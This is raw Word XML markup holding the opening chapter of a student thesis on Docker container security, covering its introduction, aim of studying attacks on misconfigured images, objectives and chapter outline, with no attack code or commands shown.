      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PAGE</w:t>
      </w:r>
      <w:r w:rsidR="00335AC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00335AC3" w:rsidRPr="00770D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Table" </w:instrText>
      </w:r>
      <w:r w:rsidR="00335AC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D6650" w14:textId="72AE59E2" w:rsidR="00335AC3" w:rsidRDefault="009860F6">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86858663" w:history="1">
        <w:r w:rsidR="00335AC3" w:rsidRPr="00224ED4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Table 1: differences between containers and VM </w:t>
        </w:r>
        <w:r w:rsidR="00335AC3" w:rsidRPr="00224ED4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[12]</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3" w:rsidRPr="00224ED4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86858663 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r w:rsidR="00335AC3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25BB2944" w14:textId="77777777" w:rsidR="00581369" w:rsidRPr="00581369" w:rsidRDefault="00581369" w:rsidP="00581369"/>
    <w:p w14:paraId="2F746A10" w14:textId="677E20E5" w:rsidR="00FC430D" w:rsidRDefault="00335AC3" w:rsidP="00B669F0">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC0D3B8" w14:textId="7D50BCF6" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="1D6E1CAF" w14:textId="4C24A277" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="347999A1" w14:textId="7A5A35C3" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="71CD60F0" w14:textId="60C021D5" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="45DED3D3" w14:textId="76786657" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="03FB1A22" w14:textId="2B15F4B6" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="0459BC9E" w14:textId="48BDC384" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="33027605" w14:textId="5CE19810" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="5593843D" w14:textId="5442ABED" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="1CCA8508" w14:textId="35BF0230" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="7BC3BA7C" w14:textId="45BD3088" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="05FB9D50" w14:textId="455B861E" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="006DACE6" w14:textId="77777777" w:rsidR="00453589" w:rsidRPr="00B669F0" w:rsidRDefault="00453589" w:rsidP="00B669F0"/>
    <w:p w14:paraId="38416D16" w14:textId="77777777" w:rsidR="00626989" w:rsidRDefault="004F547D" w:rsidP="00D92488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc86859242"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003067C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C961D3">
        <w:t>INTRODUCTION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00C961D3">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515DF090" w14:textId="25F33029" w:rsidR="00CE4828" w:rsidRDefault="008B13AA" w:rsidP="00D44C09">
      <w:r>
        <w:t>Docker has recently become one of the most popular ways to deploy applications</w:t>
      </w:r>
      <w:r w:rsidR="000C121D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C121D">
        <w:t>mainly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> because of its flexibility, speed</w:t>
      </w:r>
      <w:r w:rsidR="000B44D3">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and ease of use.</w:t>
      </w:r>
      <w:r w:rsidR="000C121D">
        <w:t xml:space="preserve"> It is a containerisation platform that lets users </w:t>
      </w:r>
      <w:r w:rsidR="007621A5">
        <w:t xml:space="preserve">run one or more isolated containers </w:t>
      </w:r>
      <w:r w:rsidR="00833D69">
        <w:t xml:space="preserve">packaged with application libraries and dependencies. Containers </w:t>
      </w:r>
      <w:r w:rsidR="000B44D3">
        <w:t xml:space="preserve">employ similar concepts to </w:t>
      </w:r>
      <w:r w:rsidR="00D50B9F">
        <w:t>virtualisation,</w:t>
      </w:r>
      <w:r w:rsidR="000B44D3">
        <w:t xml:space="preserve"> but they are created at the </w:t>
      </w:r>
      <w:r w:rsidR="009D5F57">
        <w:t>OS level and make system calls directly to the host’s kernel.</w:t>
      </w:r>
      <w:r w:rsidR="00D50B9F">
        <w:t xml:space="preserve"> Simply put, </w:t>
      </w:r>
      <w:r w:rsidR="00561DE9">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00D50B9F">
        <w:t>container share</w:t>
      </w:r>
      <w:r w:rsidR="00561DE9">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00D50B9F">
        <w:t xml:space="preserve"> the host’s kernel directly</w:t>
      </w:r>
      <w:r w:rsidR="00561DE9">
        <w:t xml:space="preserve"> with others</w:t>
      </w:r>
      <w:r w:rsidR="00AD0953">
        <w:t xml:space="preserve">, and this </w:t>
      </w:r>
      <w:r w:rsidR="005D4706">
        <w:t>gives users the flexibility to run an application on a single host machine, across multiple machines, and on a new machine all at once. It also allows users to scale their deployments</w:t>
      </w:r>
      <w:r w:rsidR="00210FC6">
        <w:t xml:space="preserve"> easily</w:t>
      </w:r>
      <w:r w:rsidR="005D4706">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD0953">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FA17C6" w14:textId="1EB0EC1F" w:rsidR="0089095C" w:rsidRDefault="00AD0953" w:rsidP="00D44C09">
      <w:r>
        <w:t xml:space="preserve">Further, containers are lightweight and </w:t>
      </w:r>
      <w:r w:rsidR="00210FC6">
        <w:t>super-fast;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unlike VM</w:t>
      </w:r>
      <w:r w:rsidR="00210FC6">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> they do not require an OS boot.</w:t>
      </w:r>
      <w:r w:rsidR="00210FC6">
        <w:t xml:space="preserve"> As to </w:t>
      </w:r>
      <w:r w:rsidR="00774327">
        <w:t xml:space="preserve">portability, containers package an application with all the necessary libraries and dependencies it needs to run. This enables users and developers to migrate and move across different </w:t>
      </w:r>
      <w:r w:rsidR="00CE4828">
        <w:t>environments</w:t>
      </w:r>
      <w:r w:rsidR="00210FC6">
        <w:t xml:space="preserve"> easily</w:t>
      </w:r>
      <w:r w:rsidR="00CE4828">
        <w:t xml:space="preserve">. For those reasons, Docker has become dominant </w:t>
      </w:r>
      <w:r w:rsidR="007F31E9">
        <w:t>in the containerisation market and is adopted by big companies, such as Google, Facebook, Spotify, and PayPal</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2141530942"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00150F98">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00150F98">
            <w:instrText xml:space="preserve"> CITATION BWo17 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00150F98">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="00150F98">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007F31E9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003220A8">
        <w:t xml:space="preserve"> In general, Docker can potentially provide a wide range of benefits, but the key ones are economic, agility, and resiliency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4780B400" w14:textId="328F40F4" w:rsidR="0089095C" w:rsidRDefault="00D47586" w:rsidP="00D44C09">
      <w:r>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidR="002B07A0">
        <w:t>Docker is a recent technology, and its security system is immature. Whil</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t xml:space="preserve">st </w:t>
      </w:r>
      <w:r w:rsidR="002B07A0">
        <w:t xml:space="preserve">Docker provides </w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>scalability</w:t>
      </w:r>
      <w:r w:rsidR="002B07A0">
        <w:t>, agility, resiliency</w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002B07A0">
        <w:t xml:space="preserve"> and many other benefits, </w:t>
      </w:r>
      <w:r w:rsidR="001A0545">
        <w:t xml:space="preserve">its </w:t>
      </w:r>
      <w:r w:rsidR="002B07A0">
        <w:t xml:space="preserve">security is becoming the main concern for </w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t>developers and DevOps.</w:t>
      </w:r>
      <w:r w:rsidR="00C60AE9">
        <w:t xml:space="preserve"> This is mainly </w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>because</w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C60AE9">
        <w:t>Docker c</w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t>ontainers share the host kernel directly</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>making them</w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t xml:space="preserve"> more vulnerable </w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t xml:space="preserve"> security threats and vulnerabilities than </w:t>
      </w:r>
      <w:r w:rsidR="001A0545">
        <w:t xml:space="preserve">the traditional virtualisation technology (VM). Simply put, Docker does not provide </w:t>
      </w:r>
      <w:r w:rsidR="00441EDA">
        <w:t>more splendid</w:t>
      </w:r>
      <w:r w:rsidR="001A0545">
        <w:t xml:space="preserve"> isolation from the host machine</w:t>
      </w:r>
      <w:r w:rsidR="00441EDA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A0545">
        <w:t>compar</w:t>
      </w:r>
      <w:r w:rsidR="00441EDA">
        <w:t xml:space="preserve">ed </w:t>
      </w:r>
      <w:r w:rsidR="001A0545">
        <w:t>to VMs.</w:t>
      </w:r>
      <w:r w:rsidR="001357A1">
        <w:t xml:space="preserve"> In addition, its </w:t>
      </w:r>
      <w:r w:rsidR="002E0058">
        <w:t xml:space="preserve">system </w:t>
      </w:r>
      <w:r w:rsidR="001357A1">
        <w:t xml:space="preserve">design encompasses various </w:t>
      </w:r>
      <w:r w:rsidR="002E0058">
        <w:t>components, containing from the host to the network and everything in between. As such, its security requires an all-inclusive approach</w:t>
      </w:r>
      <w:r w:rsidR="00E03FDE">
        <w:t xml:space="preserve"> and therefore ensuring the security of containers is difficult for many enterprises and DevOps. Therefore, securing Docker containers is significant and needs securing all its components </w:t>
      </w:r>
      <w:r w:rsidR="005B11D4">
        <w:t>from the host to the network. Another security challenge to Docker users is uploading and downloading images.</w:t>
      </w:r>
      <w:r w:rsidR="00FB30CF">
        <w:t xml:space="preserve"> It uses Docker hub as a repository to share and find images and operates similar</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>ly</w:t>
      </w:r>
      <w:r w:rsidR="00FB30CF">
        <w:t xml:space="preserve"> to google or apple store</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FB30CF">
        <w:t xml:space="preserve"> where users can download and install apps whatever they want</w:t>
      </w:r>
      <w:r w:rsidR="00ED168C">
        <w:t>. This means that threat actors can insert malicious codes</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00ED168C">
        <w:t xml:space="preserve"> and users can download and use </w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>them</w:t>
      </w:r>
      <w:r w:rsidR="00A11594">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00ED168C">
        <w:t xml:space="preserve"> enabling the attacker to steal or infiltrate valuable information.</w:t>
      </w:r>
      <w:r w:rsidR="00A11594">
        <w:t xml:space="preserve"> For those reasons, it is vital to investigate and study the security structure of Docker involving all its components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8DCEE4" w14:textId="5549A761" w:rsidR="00A11594" w:rsidRDefault="00A11594" w:rsidP="00D44C09">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This thesis comprises the research, </w:t>
      </w:r>
      <w:r w:rsidR="00A0006D">
        <w:t>techniques, and discussions of Docker security threats and attacks along with their various mitigation or remediation strategies. It covers and introduces in</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00A0006D">
        <w:t xml:space="preserve">depth </w:t>
      </w:r>
      <w:r w:rsidR="008A56AF">
        <w:t>knowledge of Docker technology, particular</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>ly</w:t>
      </w:r>
      <w:r w:rsidR="008A56AF">
        <w:t xml:space="preserve"> related to its security system and is presented both in practical and theoretical approaches. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346A8020" w14:textId="0AF8E923" w:rsidR="006C2B5A" w:rsidRDefault="006C2B5A" w:rsidP="006C2B5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc86859243"/>
      <w:r>
        <w:t>AIM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="2761700D" w14:textId="60B7E107" w:rsidR="006C2B5A" w:rsidRPr="006C2B5A" w:rsidRDefault="006C2B5A" w:rsidP="006C2B5A">
      <w:r>
        <w:t>This thesis aims to examine and evaluate Docker containers security with misconfigured images.</w:t>
      </w:r>
      <w:r w:rsidR="00BC6360">
        <w:t xml:space="preserve"> The report</w:t>
      </w:r>
      <w:r w:rsidR="009150BA">
        <w:t xml:space="preserve"> will</w:t>
      </w:r>
      <w:r w:rsidR="00BC6360">
        <w:t xml:space="preserve"> provide three types of Docker security attacks supplemented with practical approach</w:t>
      </w:r>
      <w:r w:rsidR="009150BA">
        <w:t xml:space="preserve"> to achieve the aim of this project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCB7E97" w14:textId="6B1D965F" w:rsidR="006C2B5A" w:rsidRDefault="006C2B5A" w:rsidP="006C2B5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc86859244"/>
      <w:r>
        <w:t>OBJECTIVES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="691E9A7E" w14:textId="11673E2A" w:rsidR="00BC6360" w:rsidRDefault="00BC6360" w:rsidP="00BC6360">
      <w:r>
        <w:t xml:space="preserve">The project is also set to provide several objectives with regards to the completion of the </w:t>
      </w:r>
      <w:r w:rsidR="009150BA">
        <w:t>aim as listed below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C89E6F" w14:textId="76333B8C" w:rsidR="009150BA" w:rsidRDefault="009150BA" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Providing in depth background and research on Docker environment and containerisation technology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26806305" w14:textId="42585F8B" w:rsidR="009150BA" w:rsidRDefault="009150BA" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Providing literature review on the area of Docker security </w:t>
      </w:r>
      <w:r w:rsidR="00A00837">
        <w:t>threats and attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53561F47" w14:textId="4720E804" w:rsidR="00A00837" w:rsidRDefault="00FF4655" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identifying current Docker vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471BC91" w14:textId="7542FCA8" w:rsidR="002C211E" w:rsidRDefault="002C211E" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Conduct practical various security attacks on Docker environment along with documenting the process of each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E80F604" w14:textId="1DF2BA6D" w:rsidR="00FF4655" w:rsidRDefault="00FF4655" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Providing recommendation and mitigation solutions to each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDBD284" w14:textId="25E3AD3F" w:rsidR="00FF4655" w:rsidRDefault="00FF4655" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Research into </w:t>
      </w:r>
      <w:r w:rsidR="002C211E">
        <w:t xml:space="preserve">the current </w:t>
      </w:r>
      <w:r>
        <w:t>best security practices of Docker containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7A193D" w14:textId="3D77B63A" w:rsidR="002C211E" w:rsidRDefault="002C211E" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analysing and evaluating the results obtained from each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD72773" w14:textId="58AE6206" w:rsidR="00331B7C" w:rsidRDefault="00331B7C" w:rsidP="00331B7C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc86859245"/>
      <w:r>
        <w:t>STRUCTURE OF THE PROJECT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="34F36482" w14:textId="61022198" w:rsidR="00093277" w:rsidRDefault="005A23F9" w:rsidP="00093277">
      <w:r>
        <w:t>This thesis contains</w:t>
      </w:r>
      <w:r w:rsidR="00CC5B4F">
        <w:t xml:space="preserve"> eleven chapters and is structured into three main sections to provide the reader </w:t>
      </w:r>
      <w:r w:rsidR="006A48FA">
        <w:t xml:space="preserve">with a sense of flow and </w:t>
      </w:r>
      <w:r w:rsidR="00B23571">
        <w:t>a better understanding on all concepts of the subject discussed.</w:t>
      </w:r>
      <w:r w:rsidR="00D6557C">
        <w:t xml:space="preserve"> The first section details the background research and literature review related to Docker architecture and security. The second section covers designing, implementing, testing, and experimenting of the practical approach to </w:t>
      </w:r>
      <w:r w:rsidR="00683254">
        <w:t>execute and process</w:t>
      </w:r>
      <w:r w:rsidR="00D6557C">
        <w:t xml:space="preserve"> the aimed Docker security attacks</w:t>
      </w:r>
      <w:r w:rsidR="00683254">
        <w:t>. Finally, the third section includes the findings and outcomes accompanied with analysing and evaluating of the results obtained from each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CFA255" w14:textId="0DFC8F92" w:rsidR="009B2382" w:rsidRDefault="009B2382" w:rsidP="00093277">
      <w:r>
        <w:t xml:space="preserve">Chapter one provides a brief overview </w:t>
      </w:r>
      <w:r w:rsidR="005B02D1">
        <w:t>of the report, detailing the aims and objectives of the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C869E" w14:textId="6CF431A2" w:rsidR="005B02D1" w:rsidRDefault="005B02D1" w:rsidP="00093277">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter two covers a detailed background research on the fundamental elements of Docker systems</w:t>
      </w:r>
      <w:r w:rsidR="00E73776">
        <w:t>, security,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and architectures. It also discusses and compares traditional virtualisation </w:t>
      </w:r>
      <w:r w:rsidR="00E73776">
        <w:t xml:space="preserve">vs </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">containerisation technologies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F21110E" w14:textId="25F5CC0E" w:rsidR="00E73776" w:rsidRDefault="00E73776" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter three concentrates on literature review of previous works related to the</w:t>
      </w:r>
      <w:r w:rsidR="000B37D1">
        <w:t xml:space="preserve"> research</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> topic</w:t>
      </w:r>
      <w:r w:rsidR="000B37D1">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B37D1">
        <w:t xml:space="preserve">equip the author to </w:t>
      </w:r>
      <w:r w:rsidR="00FE08D8">
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidR="000B37D1">
        <w:t xml:space="preserve"> a solid </w:t>
      </w:r>
      <w:r w:rsidR="00FE08D8">
        <w:t xml:space="preserve">understanding and </w:t>
      </w:r>
      <w:r w:rsidR="000B37D1">
        <w:t>knowledge on Docker security threats and attacks</w:t>
      </w:r>
      <w:r w:rsidR="00FE08D8">
        <w:t xml:space="preserve"> in general</w:t>
      </w:r>
      <w:r w:rsidR="000B37D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4F83BB" w14:textId="6311A7B2" w:rsidR="000B37D1" w:rsidRDefault="000B37D1" w:rsidP="00093277">
      <w:r>
        <w:t xml:space="preserve">Chapter four focuses on the research methodologies </w:t>
      </w:r>
      <w:r w:rsidR="00987185">
        <w:t>applied</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00987185">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:t>this project</w:t>
      </w:r>
      <w:r w:rsidR="00987185">
        <w:t xml:space="preserve"> to achieve the aims and objectives set</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375B43C9" w14:textId="09451648" w:rsidR="00987185" w:rsidRDefault="00987185" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter five details the process of designing and implementing the aimed security attacks on Docker environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A74872C" w14:textId="4D921F2F" w:rsidR="00987185" w:rsidRDefault="00987185" w:rsidP="00093277">
      <w:r>
        <w:t xml:space="preserve">Chapter six </w:t>
      </w:r>
      <w:r w:rsidR="00FE08D8">
        <w:t>provides the testing and experimenting process of each designed attack on Docker containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C33E8A" w14:textId="1C88B87C" w:rsidR="00FE08D8" w:rsidRDefault="00FE08D8" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter seven examines</w:t>
      </w:r>
      <w:r w:rsidR="009C70A5">
        <w:t xml:space="preserve"> and analyses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the results obtained from each </w:t>
      </w:r>
      <w:r w:rsidR="009C70A5">
        <w:t>attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A2EAF" w14:textId="74E7A45B" w:rsidR="009C70A5" w:rsidRDefault="009C70A5" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter eight provides the overall summary of the report along with recommendations for further research on the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75992187" w14:textId="6F71BCB3" w:rsidR="009C70A5" w:rsidRDefault="009C70A5" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter nine details the experiences and lesson learnt</w:t>
      </w:r>
      <w:r w:rsidR="000D6CBB">
        <w:t xml:space="preserve"> by the author</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> throughout the course of th</w:t>
      </w:r>
      <w:r w:rsidR="000D6CBB">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79612286" w14:textId="1B98AD69" w:rsidR="000D6CBB" w:rsidRDefault="000D6CBB" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter ten provides all the academic and journal references used to complete and write this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1024AC8C" w14:textId="77777777" w:rsidR="00FE08D8" w:rsidRPr="00093277" w:rsidRDefault="00FE08D8" w:rsidP="00093277"/>
    <w:p w14:paraId="1DF365A9" w14:textId="77777777" w:rsidR="00093277" w:rsidRPr="00093277" w:rsidRDefault="00093277" w:rsidP="00093277"/>
    <w:p w14:paraId="5A9FFFB0" w14:textId="77777777" w:rsidR="002C211E" w:rsidRPr="002C211E" w:rsidRDefault="002C211E" w:rsidP="002C211E"/>
    <w:p w14:paraId="38B5AF9F" w14:textId="77777777" w:rsidR="00331B7C" w:rsidRPr="00331B7C" w:rsidRDefault="00331B7C" w:rsidP="00331B7C"/>
    <w:p w14:paraId="05907D37" w14:textId="77777777" w:rsidR="006C2B5A" w:rsidRPr="006C2B5A" w:rsidRDefault="006C2B5A" w:rsidP="006C2B5A"/>
